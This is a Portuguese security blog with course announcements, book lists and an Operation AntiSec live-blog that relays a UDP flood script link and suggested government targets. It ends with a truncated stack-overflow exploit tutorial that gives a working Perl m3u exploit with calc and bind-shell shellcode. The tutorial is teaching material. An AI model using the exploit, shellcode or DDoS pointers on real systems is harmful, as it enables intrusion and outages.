Obviamenteque a maioria dessas certificações é barata e pode ser tiradafacilmente. Algumas são mais fáceis, como citadas ao longo dotexto, mas outras demandam meses de preparação, mesmo que oprofissional já atue na área e tenha alguns anos de experiência.No entanto, mesmo que o tempo e dinheiro empregados sejam em grandequantidade algumas vezes, podem acreditar: vale muito à pena. Masobviamente que vale mais ainda à pena, quando o profissional alémdo papel timbrado, tenha a prática e vivência necessárias paraimpor-se no mercado como profissional respeitado e que realmente sabeo que está fazendo.

Esperoque, de alguma forma, esse artigo possa ter tornado o caminho devocês em busca das certificações em segurança, ainda mais claro.

Curso de Monitoramento e Detecção de Intrusão - EaD

2011-09-15T20:46:00.000-03:00

Caros,

Gostaria de anunciar o curso de Monitoramento e Detecção de Intrusão, na modalidade EaD.

O curso ocorrerá entre nos dias 14, 21, 28/10 e 04/11, de 21h às 00h, onde o aluno terá contato direto com o instrutor através de uma plataforma de conferência on-line, com slides, voz, e desktop sharing.

O valor do curso é de R$ 300,00 e a carga horária é de 12h completamente hands-on.

Segue abaixo o cronograma do curso:

Utilização do SYSLOG-NG
    Administração e monitoramento de logs e evento no sistema;
    Logs locais e remotos;
    Gerenciamento de Servidores de Logs;
    Definindo política de rotacionamento de logs;

HIDS (Host Intrusion Detection System)
    Entendendo um HIDS; Instalação e Configuração do OSSEC;
    Instalação e Configuração de interface web para gerenciamento dos logs do OSSEC;

Implementação de Sistema de Monitoramento
    Entendendo os sistemas de monitoramento;
    Ferramentas utilizadas;
    Instalação e configuração do Nagios;
    Plugins do Nagios;

IDS / IPS (Network Intrusion Detection System / Intrusion Prevention System)
    Entendendo um NIDS e um IPS;
    Instalação e Configuração do Snort Inline;
    Instalação e Configuração do BarnYard2;
    Instalação e Configuração do Snorby;
    Instalação e Configuração do PulledPork;
    Criação de regras para o Snort;

Pré-requisitos:

Conhecimentos básicos de segurança da informação (conceitos existentes nas normas ISO 27001 e 27002).
Operação básica de ambiente Linux.
Conhecimentos básicos sobre camadas e protocolos de rede.

O pagamento será feito via pagseguro e poderá ser parcelado no cartão de crédito.

Quem tiver interesse no curso, por favor, acesse o link http://migre.me/5HDaN e faça sua inscrição no curso "Monitoramento e Detecção de Intrusão" que em breve enviarei um e-mail para o pgto via PagSeguro.

[ ]'s

Luiz Vieira

Curso de Segurança em Servidores WEB - EaD

2011-08-19T10:26:00.003-03:00

Caros,

Gostaria de anunciar o curso de Segurança em Servidores WEB, na modalidade EaD.

O curso ocorrerá entre os dias 06/09 à 09/09, de 21h às 23h através da modaliade EaD, onde o aluno terá contato direto com o instrutor através de uma plataforma de conferência on-line, com slides, voz, e desktop sharing.

O valor do curso é de R$200,00 e a carga horária é de 8h completamente hands-on.

Segue abaixo o cronograma do curso:

Ambientação e compreensão do cenário

Instalação e Configuração de um servidor WEB
Instalação da aplicação WEB para testes

Ataques à servidores WEB

Tipos de ataques
Fingerprint em Web Server
Descobrindo Vulnerabilidades com Nikto
Auditoria e Exploração de Web Servers com W3AF
Online Scanner
Teste com página maliciosa

Protegendo seu servidor WEB

Ambiente seguro com chroot
Instalação do Apache no chroot e configuração
Instalando e configurando o PHP5 + Suhosin no chroot

Segurança Avançada no Apache

Mod_security
Mod_evasive
Mod_qos
Mod_limitipconn
OSSEC

O pagamento será feito via pagseguro e poderá ser parcelado no cartão de crédito.

Quem tiver interesse no curso, por favor, acesse o link http://migre.me/5nagH e faça sua inscrição no curso "Segurança em Servidores WEB" que em breve enviarei um e-mail para o pgto via PagSeguro.

[ ]'s

Burp Suite - Ferramenta para teste em aplicações web

2011-08-12T19:05:00.001-03:00

Burp Suite v1.1 Introduction

View more presentations from Ashraf.Bashir

Livros de segurança

2011-08-09T18:33:00.002-03:00

Apenas para postar algo de interessante aqui, depois de um pouco mais de um mês sem postar nada por conta de falta de tempo (fica difícil trampando 80h por semana ter tempo de postar algo por aqui...).

Segue abaixo uma lista de livros de segurança, alguns bem interessantes e outros um pouco menos :-) Mas já ajuda um pouco para quem quiser uma lista de indicações literárias. Há muitos outros excelentes livros, mas aí a lista ficaria muuuito maior.

De qualquer forma, espero que aproveitem:

Metasploit: The Penetration Tester’s Guide
http://www.wowebook.com/book/metasploit/

Managing Infrastructure with Puppet
http://www.wowebook.com/book/managing-infrastructure-with-puppet/

iPhone and iOS Forensics: Investigation, Analysis and Mobile Security for Apple iPhone, iPad and iOS Devices
http://www.wowebook.com/book/iphone-and-ios-forensics/

The Basics of Information Security: Understanding the Fundamentals of InfoSec in Theory and Practice
http://www.wowebook.com/book/the-basics-of-information-security/

Security Power Tools
http://www.wowebook.com/book/security-power-tools/

Cyber Warfare: Techniques, Tactics and Tools for Security Practitioners
http://www.wowebook.com/book/cyber-warfare/

Security Engineering: A Guide to Building Dependable Distributed Systems, 2nd Edition
http://www.wowebook.com/book/security-engineering-2nd-edition/

The Shellcoder’s Handbook, 2nd Edition
http://www.wowebook.com/book/the-shellcoders-handbook-2nd-edition/

BackTrack 4: Assuring Security by Penetration Testing
http://www.wowebook.com/book/backtrack-4/

Web Security, Privacy and Commerce, 2nd Edition
http://www.wowebook.com/book/web-security-privacy-and-commerce-2nd-edition/

Securing the Cloud: Cloud Computer Security Techniques and Tactics
http://www.wowebook.com/book/securing-the-cloud/

Hacking Exposed: Web Applications, 3rd Edition
http://www.wowebook.com/book/hacking-exposed-web-applications-3rd-edition/

Ninja Hacking: Unconventional Penetration Testing Tactics and Techniques
http://www.wowebook.com/book/ninja-hacking/

Practical Lock Picking: A Physical Penetration Tester’s Training Guide
http://www.wowebook.com/book/practical-lock-picking/

Gray Hat Hacking The Ethical Hackers Handbook, 3rd Edition
http://www.wowebook.com/book/gray-hat-hacking-the-ethical-hackers-handbook-3rd-edition/

Hacking Exposed: Wireless, 2nd Edition
http://www.wowebook.com/book/hacking-exposed-wireless-2nd-edition/

Hacking Exposed: Malware & Rootkits
http://www.wowebook.com/book/hacking-exposed-malware-and-rootkits/

Hacking Exposed: Linux, 3rd Edition
http://www.wowebook.com/book/hacking-exposed-linux-3rd-edition/

Hacking Exposed: Web 2.0
http://www.wowebook.com/book/hacking-exposed-web-2-0/

Slides da palestra Forense Computacional no FISL 12

2011-07-05T10:23:00.001-03:00

View more presentations from luizvieira

Twitter

2011-07-01T22:51:00.009-03:00

Enfim decidi sair do ostracismo e criar um twitter. Só não sei se terei tempo de ficar twittando hehehehe

@HackProofing

[ ]'s

Foto FISL 12

2011-06-30T20:11:00.003-03:00

Foto com duas pessoas (da esquerda para direita) de quem admiro o trabalho na área de forense e segurança: Paulo Neukamp (desenvolvedor do FDTK) e "eth0" (Eduardo).

Só de encontrá-los no FISL, bem como o Rodrigo "Sp0oker" Montoro (que infelizmente não está na foto), o evento já valeu bastante.

Abração galera, e espero encontrá-los novamente em breve!

Palestra no FISL

2011-06-25T11:52:00.004-03:00

Caros, dia 30/06 apresentarei a palestra Forense Computacional com Software Livre no FISL, às 9h00. Quem tiver interesse, apareça por lá para assistir e depois bater papo comigo :-)

Atualização (30/06):

Palestra apresentada, e parece que o pessoal gostou. Nos próximos dias postarei os slides da palestra e o vídeo do ophcrack. O vídeo com o Maltego rodando para realizar o rastreamento de dados a partir de um e-mail não postarei, pois contém informações internas da empresa onde trabalho no momento.

Obrigado pela presença de todos!

[ ]'s

Mais novidades da Operation AntiSec

2011-06-22T11:20:00.012-03:00

Ontem alguns sites como o www.brasil.gov.br já caíram, e nenhum pronunciamento foi feito, a não ser no twitter no LulzSecBR.

O que será que nosso governo vai fazer? Colocar os site no ar de novo e esperar para ver no que dá? Aguardar novos ataques?

Apenas para efeito informativo, se é que alguma autoridade lê esse blog, hoje eles já informaram novos ataques, como por exemplo o site do MEC e da Receita Federal (para esse último, o ataque já está programado para as 13h).

E então, braços cruzados ou os verdadeiros bombeiros vão aparecer quando o circo estiver pegando fogo?

Nem sei se ainda resta alguma esperança, mas pagarei pra ver :-)

Mensagem postada pelo grupo no youtube:
http://www.youtube.com/watch?v=aIsTd9WIRKU

Atualizações (13h26):
http://www.bmfbovespa.com.br/ <--- caiu tbm

http://www.petrobras.com.br/ <--- caiu tbm

Vejam o que os caras mapearam para saber onde atacar:
http://imgpaste.com/i/ockll.png
http://imgpaste.com/i/osxds.png

Atualizações (13h34):
Pretendem deixar de usar o LOIC para usar isso:
http://www.cesarkallas.net/arquivos/outros/udp_pl.txt

Sugerem como alvo:
http://www.portaltransparencia.gov.br

Atualizações (14h00):
Música tema do LulzSec:
http://www.youtube.com/watch?v=7YoDt-MxhHg

Sugerem http://www.abin.gov.br/ como alvo.

Ganham acesso ao admin de http://www.nucleoacademico.org.br/home.php .

Atualizações (24/06 - 06h53):
Dados de um dos integrantes:
http://pastie.org/2113810

Citação do grupo sobre a mafia das licitações:
http://lulzsecurity.com.br/lulzsec-news/mafia-das-licitacoes/

Atualizações (26/06):
Será que a brincadeira acabou de verdade?
http://pastebin.com/1znEGmHa

Geek Culture

2011-06-22T07:27:00.001-03:00

Operation Anti-Security

2011-06-21T07:46:00.001-03:00

Nessas últimas semanas começamos uma nova era. Uma era onde os mouses e as mentes de milhares se unem para realizar ataques simultâneos com um objetivo em comum: pilhar e destruir. Só que, diferente da idade média, onde se usavam espadas, machados, martelos de guerra e maças, as armas são os chips, os mouses e as mentes.

E como nos protegíamos antigamente? Nos acastelávamos atrás de muralhas defendidas por espigões, flechas e óleo quente. E agora? Agora, muitos não sabem o que fazer, ou quando sabem dizem que não precisam , pois com eles não vai acontecer nada.

Já ouvi diretor de TI de empresa falar que pentest é inútil e que proteção de perímetro não serve para nada, pois na opinião dessa pessoa basta “comprar uma caixinha” que todo o problema está resolvido.

E é justamente por contar com a existência em massa de pessoas de mente embotada dessa maneira, que os grupos LulzSec e Anonymous decidiram se juntar e explorar as brechas existentes em sistemas de grandes empresas, governos e instituições militares. Agora, será que uma “caixinha preta” será a solução para tudo isso? De acordo com esse diretor que citei, sim! Vocês vão pagar para ver?

Quem não quiser pagar pra ver, meu conselhos:

atualizem os sistemas;
auditem as regras de firewall e IDS, adaptando-as à realidade que começaremos a enfrentar em breve;
contratem profissionais de segurança (profissionais, não o sobrinho do dono);
auditem toda a infraestrutura da empresa, seja física, seja lógica;
invistam no monitoramento, não do que o funcionário está fazendo no browser, mas sim dos incidentes da rede, com boas ferramentas e acima de tudo, uma boa equipe de resposta a incidentes.

Enquanto a mentalidade empresarial não mudar, seremos reféns de grupos como estes, que estão organizando a Operation Anti-Security.

Quando digo mentalidade, sempre surge em minha mente as frases:

o foco do meu negócio não é TI, então não tem porque investir tanto nesse setor de minha empresa;
TI me dá muito gasto e pouco retorno, chega de gastar com esses caras que ficam tomando cafezinho o dia todo;
entregue cedo, entregue sempre, prefiro que você me entregue 80% do projeto em 2 dias do que 100% em uma semana;
vendam, vendam e vendam, que o pessoal de TI se vira para entregar;
metodologias ágeis e TDD só servem para atrapalhar e aumentar o tempo para a entrega do projeto, vocês estão proibidos de implementar essas metodologias ao desenvolverem algo.

Parece piada, mas ouço essas pérolas ao meu redor... Será que essas empresas sabem algo de segurança? Será que elas serão alvos fáceis de uma operação anti-segurança?

Enquanto não cair a ficha de que sem TI nenhuma empresa funciona hoje em dia, que o fato de um cara ficar sentado o dia inteiro tomando cafezinho em frente ao computador (olhando gráficos, logs ou seja lá o que for) não quer dizer que não esteja trabalhando, que eficácia é diferente de eficiência, que TI precisa de escopos bem definidos e prazos coerentes e realistas, nós vamos retornar à idade das trevas no setor tecnológico. Porque quando uma operação, como essa que começará a ser deflagrada pelo LuzlSec + Anonymous, ocorrer, não será apenas a rede da Sony com nossos cartões de crédito que será destruída e pilhada, ou a Amazon que ficará fora do ar. Serão hospitais que terão equipamentos comprometidos, abastecimento de água e energia interrompidos, usinas nucleares controladas (lembram-se do Stuxnet?!) e muitas outras coisas piores do que perder os dados de seu projeto no qual investiu milhões de doláres.

Mas é justamente protegendo o seu projeto, bem como os governos protegendo seus governados, que cada um fará sua parte e a comunidade de segurança atuando através de empresas ou instituições conscientes, que conseguiremos fazer com que essa operação cause bem menos malefícios do que aquilo que pode acontecer se continuarmos no mesmo cenário atual.

E então, vai pagar pra ver ou vai começar a agir desde já? A comunidade de segurança conta com essa atitude proativa das empresas e governos para que possa atuar com todo o gás e recursos necessários.

Para saber um pouco mais sobre a operação AntiSec:

Aprendendo Python

2011-06-15T08:57:00.002-03:00

Para quem quer aprender Python, seguem dois links, um para um livro excelente traduzido para português, e outro para uma série de 21 vídeo-aulas do professor universitário Ronaldo Ramos (tbm em português):

- http://www.swaroopch.com/notes/Python_pt-br:Indice - A Byte of Python in Brazilian

- http://www.youtube.com/watch?v=hsIU1eX1bSU - primeira aula do curso de lógica de programação e Python

E, obviamente, eu não poderia deixar de enviar o link de download do curso do MIT sobre Ciência da Computação e Programação, com Python:

- http://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-00-introduction-to-computer-science-and-programming-fall-2008/download-course-materials/

(nesse link vocês poderão baixar os arquivos compactados do curso completo, mas para assistir os vídeos através desse material, é necessário estar conectado, pois no .zip os vídeos não estão presentes, mas apenas o .html com a chamada para os mesmos).

Para prestigiar mais escritores brasleiros, seguem mais dois links interessantes:

- Python para desenvolvedores: http://ark4n.wordpress.com/python/

- Aprendendo Django no Planeta Terra: http://www.aprendendodjango.com/

Divirtam-se!

The Zen of Python, by Tim Peters

2011-06-14T09:50:00.001-03:00

Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!

Lista de livros

2011-06-07T11:38:00.002-03:00

Muitas pessoas me solicitam listas de livros como bibliografia para quem está interessado em segurança da informação. Por isso, pensei em hoje postar uma lista que criei com alguns livros que julgo interessantes para quem deseja atuar em algumas áreas de seg.info.

Separei por área de atuação por julgar mais facilmente compreensível. Obviamente que essa não é uma lista exaustiva e nem limitada em si, mas que servirá para o bom propósito de quem está iniciando em alguma dessas áreas.

Organizei, também, as área de atuação de maneira sequencial e coerente, onde o profissional que se interessa por segurança parte do cargo de administrador de redes, até a área de desenvolvimento de exploits, em uma sequência lógica e coerente.

Normalmente o profissional que se interessa por segurança começa em administrador de rede, e vai seguindo em frente por cada um desses cargos. Obviamente que o mesmo pode pular um ou mais deles, mas aí ele terá um lapso de falta de conhecimento que aumentará sua curva de aprendizado no campo seguinte.

Vocês poderão baixar cada um desses livros a partir de dois links:
http://www.wowebook.com/
http://ebooklink.net/g/home/

Os mesmos estão organizados por categoria, com o seu título e o nome da editora entre parêntesis.

- Administrador de rede

Linux Network Administrators Guide (O'Reilly)
Security for Microsoft Windows System Administrators (Syngress)

- Analista de infraestrutura

Aggressive network self-defense (Syngress)
Hack Proofing Linux - A Guide to Open Source Security (Syngress)
Security Power Tools (O'Reilly)

- Analista de segurança

Hack Proofing Your Network (2nd Edition) (Syngress)
Intrusion Prevention and Active Response (Syngress)
IT Security Project Management Handbook (Syngress)
Security Warrior (O'Reilly)

- Penetration Tester

Hacking - The Next Generation (O'Reilly)
Hacking Exposed - 6thED Network Security Secrets And Solutions (McGraw-Hill)
Hacking Exposed - Windows - 3rd Edition (McGraw-Hill)
Hacking Exposed - Web Applications - 3rd Edition (McGraw-Hill)

- Investigador Forense Digital

Hacking Exposed Computer Forensics Computer Forensics Secrets & Solutions (McGraw-Hill)
Digital Forensics with Open Source Tools (Syngress)
Virtualization and Forensics - A Digital Forensic Investigator's Guide to Virtual Environments (Syngress)
Windows Forensic Analysis (Syngress)
Digital Forensics for Network, Internet, and Cloud Computing: A Forensic Evidence Guide for Moving Targets and Data (Syngress)

- Analista de malware

Hacking Exposed - Malware and Rootkits (McGraw-Hill)
Malware Analysts Cookbook (Wiley Publishing)
Malware Forensics Investigating and Analyzing Malicious Code (Syngress)
The Art of Computer Virus Research and Defense (Symantec Press)
The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System (Wordware Publishing)

- Pesquisador de vulnerabilidades

Buffer Overflow Attacks - Detect, Exploit, Prevent (Syngress)
Gray Hat Hacking - 3nd Ed (McGraw-Hill)
The IDA Pro Book - The Unofficial Guide to the World's Most Popular Disassembler (no starch press)
Reversing - Secrets of Reverse Engineering (Wiley Publishing)
Hacking The Art of Exploitation - 2nd Edition (no starch press)

- Desenvolvedor de Exploits

Exploiting Software How to Break Code (Pearson Education)
Gray Hat Python - Python Programming for Hackers and Reverse Engineers (no starch press)
Writing Security Tools And Exploits (Syngress)
The Shellcoders Handbook Discovering and Exploiting Security Hole 2nd Edition (Wiley Publishing)
A Guide to Kernel Exploitation - Attacking the core (Syngress)

Sei que muitos de vocês podem contribuir com essa lista, então podem postar suas contribuições nos comentário, citando para qual categoria o livro é mais indicado, o título do mesmo e a editora que o publicou.

[ ]'s
Luiz

Escrevendo um exploit para Stack Overflow - parte 3 (final)

2011-06-07T10:54:00.007-03:00

Pular para o shellcode de uma maneira confiável

Procuramos colocar nosso shellcode exatamente onde o ESP aponta (ou, se olharmos por outro ângulo, o ESP aponta diretamente para o início de nosso shellcode). Se não fosse esse o caso, teríamos que olhar o conteúdo dos demais registradores e esperar encontrar nosso buffer. De qualquer forma, nesse exemplo em particular, podemos utilizar o ESP.

A razão por detrás de sobrescrever o EIP com o endereço do ESP, é que queremos que a aplicação pule para o ESP e execute o shellcode.

Pular para o ESP é algo muito comum em aplicações Windows. De fato, aplicações Windows utiliza uma ou mais dll's, e essas dll's contém muitas instruções em código. Além do mais, o endereço utilizado por essas dll's normalmente são estáticos. Então, se encontrarmos uma dll que contenha a instrução para pular para o ESP, e se pudermos sobrescrever o EIP com o endereço daquela instrução na dll, então deve funcionar, certo?

Vamos ver. Em primeiro lugar, precisamos entender o que o opcode para “jmp esp” é.

Nós podemos fazer isso executando o Easy RM to MP3 a partir do Windbg (obviamente após haver instalado o windbg). Apenas abra o Easy RM to MP3, não precisa fazer mais nada.

Ao executar o processo, a aplicação fará um break.

Na linha de comando do windbg, na parte inferior da tela, digite “a” (de assembler, sem aspas) e pressione enter. Agora digite “jmp esp” e pressione enter. Pressione enter novamente e digite “u” (unassemble) seguido pelo endereço que foi mostrado antes ao digitar “jmp esp”:

Próximo ao 7C90120E, podemos ver ffe4. Este é o opcode para o jmp esp.

Agora precisamos encontrar esse opcode em uma das dll's carregadas.

Vamos ver as dll's carregadas pelo Easy RM to MP3:

Se podemos encontrar o opcode em uma dessas dll's, então teremos uma boa chance de fazer o exploit funcionar de maneira confiável em plataforma windows. Se precisarmos utilizar uma dll que pertence ao só, então poderemos descobrir que o exploit não funciona em outras versões do SO. Então vamos buscar a área de uma das dll's do Easy RM to MP3 primeiro.

Vamos buscar na área do E:\ Arquivos de programas\Easy RM to MP3 Converter\MSRMCcodec02.dll. Essa dll é carregada entre 019E0000 e 01EAD000. Busque nesta área por ff e4:

Excelente. Quando selecionamos um endereço, é importante olhar por bytes nulos. Devemos tentar evitar utilizar endereços com bytes nulos (especialmente se desejamos utilizar os dados de buffer que vêm depois do EIP. O byte nulo se tornaria um finalizador de string e o resto dos dados de buffer seriam inutilizados).

Nota: há outras maneiras para conseguir os endereços de opcodes:

findjmp (de Ryan Permeh): compile o findjmp.c e execute-o com os seguintes parâmetros: findjmp [dllfile] [register]
o metasploit opcode database
memdump
pvefindaddr, um plugin para o Immunity Debugger. De fato essa é a melhor opção, pois filtra automaticamente os ponteiro não-confiáveis.

Veja abaixo o ponteiro que o Immunity retornou, utilizando o plugin pvefindaddr (apenas um, ao invés de vários como o windbg):

Como queremos colocar nosso shellcode no ESP (que está colocado em nosso payload após escrever o EIP), o endereço jmp esp a partir da lista não deve ter bytes nulos. Bytes nulos agem como finalizador de strings, assim tudo o que vier após seria ignorado. Em alguns casos, não teria problema em ter um endereço que se inicia com byte nulo.

Vamos utilizar o payload após o sobrescrição do EIP para armazenar nosso shellcode, assim o endereço não conteria bytes nulos.

O primeiro endereço de acordo com o Windbg é 0x01B1F23A

Verifique que este endereço contém o jmp esp (fazendo o unassemble a instrução em 01B1F23A):

Se agora sobrescrevermos o EIP com 0x01B1F23A, um jmp esp será executado. ESP contém nosso shellcode... assim deveríamos agora ter um exploit funcional. Vamos testar com o nosso shellcode “NOP & break”.

Encerre o Windbg.

Crie um novo arquivo m3u utilizando o script abaixo:

my $file= "teste4.m3u"; 
my $junk= "A" x 26073;
my $eip = pack('V',0x01b1f23a);  
my $shellcode = "\x90" x 25;   
$shellcode = $shellcode."\xcc";
#isso fará com que a aplicação dê um break, simulando o shellcode, mas permitindo prosseguir com o debugging 
$shellcode = $shellcode."\x90" x 25; 
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode; 
close($FILE);
print "Arquivo m3u criado com sucesso\n";

Execute a aplicação pelo Immunity ou pelo Windbg, e abra o arquivo m3u com a aplicação.

A aplicação agora dá um break no endereço 000FF745, que é o local de nosso primeiro break. Assim o jmp esp funciona bem (esp começa em 000FF730, mas contém NOPs até o 000FF744).

Tudo o que precisamos fazer agora é alterar nosso shellcode e finalizar o exploit.

Shellcode funcional e finalização do exploit

O Metasploit possui um ótimo gerador de payload que o ajudará a construir seu próprio shellcode. Payloads podem ter várias opções, e (dependendo do que você precisa), pode ser pequeno ou muito grande. Se você tiver uma imitação de tamanho em termos de espaço em buffer, então pode procurar por multi-staged shellcode, ou utilizar shellcodes criados manualmente tal como esse aqui (shellcode de 32bytes para executar um cmd.exe em Windows XP SP2). Alternativamente, é possível dividir o shellcode em pequenos “eggs” e usar uma técnica chamada de “egg-hunting” para fazer o reassemble do shellcode antes de executá-lo. Em breve veremos mais materiais que falam sobre egg-hunting e omelet hunters.

Digamos que queremos que o arquivo calc.exe seja executado como nosso payload, então nosso shellcode pode parecer com o seguinte:

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

Finalize o script perl e execute-o:

#
# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by Peter Van Eeckhoutte
#
my $file= "exploitrmtomp3.m3u";

my $junk= "A" x 26073;
my $eip = pack('V',0x01b1f23a);  #jmp esp from MSRMCcodec02.dll
my $shellcode = "\x90" x 25;
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Crie o arquivo m3u, abra-o e veja a aplicação morrer (e a calculadora deve abrir). Conseguimos fazer o exploit funcionar!

E se quisermos fazer algo diferente de executar a calculadora?

Podemos criar outro shellcode e alterar o shellcode de execução da calculadora por seu novo shellcode, mas este código pode não funcionar porque o shellcode pode ser grande, alocação de memória ser diferente, e shellcodes grandes aumentam o risco de haver caracteres inválidos no mesmo, que precisam ser filtrados.

Vamos dizer que queremos que o exploit faça um bind em uma porta para que possamos nos conectar remotamente e ter um terminal de comando.

O shellcode pode parecer com o seguinte:

#
# windows/shell_bind_tcp - 344 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, LPORT=5555, RHOST=
"\x31\xc9\xbf\xd3\xc0\x5c\x46\xdb\xc0\xd9\x74\x24\xf4\x5d" .
"\xb1\x50\x83\xed\xfc\x31\x7d\x0d\x03\x7d\xde\x22\xa9\xba" .
"\x8a\x49\x1f\xab\xb3\x71\x5f\xd4\x23\x05\xcc\x0f\x87\x92" .
"\x48\x6c\x4c\xd8\x57\xf4\x53\xce\xd3\x4b\x4b\x9b\xbb\x73" .
"\x6a\x70\x0a\xff\x58\x0d\x8c\x11\x91\xd1\x16\x41\x55\x11" .
"\x5c\x9d\x94\x58\x90\xa0\xd4\xb6\x5f\x99\x8c\x6c\x88\xab" .
"\xc9\xe6\x97\x77\x10\x12\x41\xf3\x1e\xaf\x05\x5c\x02\x2e" .
"\xf1\x60\x16\xbb\x8c\x0b\x42\xa7\xef\x10\xbb\x0c\x8b\x1d" .
"\xf8\x82\xdf\x62\xf2\x69\xaf\x7e\xa7\xe5\x10\x77\xe9\x91" .
"\x1e\xc9\x1b\x8e\x4f\x29\xf5\x28\x23\xb3\x91\x87\xf1\x53" .
"\x16\x9b\xc7\xfc\x8c\xa4\xf8\x6b\xe7\xb6\x05\x50\xa7\xb7" .
"\x20\xf8\xce\xad\xab\x86\x3d\x25\x36\xdc\xd7\x34\xc9\x0e" .
"\x4f\xe0\x3c\x5a\x22\x45\xc0\x72\x6f\x39\x6d\x28\xdc\xfe" .
"\xc2\x8d\xb1\xff\x35\x77\x5d\x15\x05\x1e\xce\x9c\x88\x4a" .
"\x98\x3a\x50\x05\x9f\x14\x9a\x33\x75\x8b\x35\xe9\x76\x7b" .
"\xdd\xb5\x25\x52\xf7\xe1\xca\x7d\x54\x5b\xcb\x52\x33\x86" .
"\x7a\xd5\x8d\x1f\x83\x0f\x5d\xf4\x2f\xe5\xa1\x24\x5c\x6d" .
"\xb9\xbc\xa4\x17\x12\xc0\xfe\xbd\x63\xee\x98\x57\xf8\x69" .
"\x0c\xcb\x6d\xff\x29\x61\x3e\xa6\x98\xba\x37\xbf\xb0\x06" .
"\xc1\xa2\x75\x47\x22\x88\x8b\x05\xe8\x33\x31\xa6\x61\x46" .
"\xcf\x8e\x2e\xf2\x84\x87\x42\xfb\x69\x41\x5c\x76\xc9\x91" .
"\x74\x22\x86\x3f\x28\x84\x79\xaa\xcb\x77\x28\x7f\x9d\x88" .
"\x1a\x17\xb0\xae\x9f\x26\x99\xaf\x49\xdc\xe1\xaf\x42\xde" .
"\xce\xdb\xfb\xdc\x6c\x1f\x67\xe2\xa5\xf2\x98\xcc\x22\x03" .
"\xec\xe9\xed\xb0\x0f\x27\xee\xe7";

Como podemos ver, este shellcode possui 344 bytes de tamanho (e para executar a calculadora precisa apenas 144 bytes).

Se apenas copiarmos e colarmos este shellcode, podemos ver que a aplicação vulnerável não trava mais.

Isso indica, ou um problema com o tamanho do buffer do shellcode (mas se testarmos o tamanho do buffer veremos que esse não é o problema), ou nos deparamos com caracteres inválidos no shellcode. Podemos excluir esses caracteres inválidos quando criamos o shellcode com o metasploit, mas precisaremos saber quais caracteres são permitidos e quais não são. Por padrão, bytes nulos são restringidos (porque eles farão um break no exploit), mas quais são os outros caracteres?

O arquivo m3u provavelmente deveria conter nomes de arquivos. Então um bom começo seria filtrar todos os caracteres que não são permitidos em nomes de arquivos e caminhos. Podemos também restringir os caracteres selecionados, utilizando um outro decoder. Utilizei o shikata_ga_nai, mas talvez o alpha_upper funcione melhor para nomes de arquivos. Utilizar outro enconder provavelmente aumentará o tamanho do shellcode, mas já vimos que o tamanho não é o maior problema.

Vamos tentar construir um “tcp shell bind”, usando o encoder alpha_upper. Vamos fazer um bind de um shell à porta local 4444. O novo shellcode possui 730 bytes de tamanho.

Nota: para criar o payload, abra o Metasploit com ./msfconsole, e execute os seguintes comando:

msf> use payload/windows/shell_bind_tcp

msf payload(bind_tcp) > generate -e x86/alpha_upper

Vamos usar esse shellcode. O novo exploit se parecerá com o abaixo:

#
# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by Peter Van Eeckhoutte
#
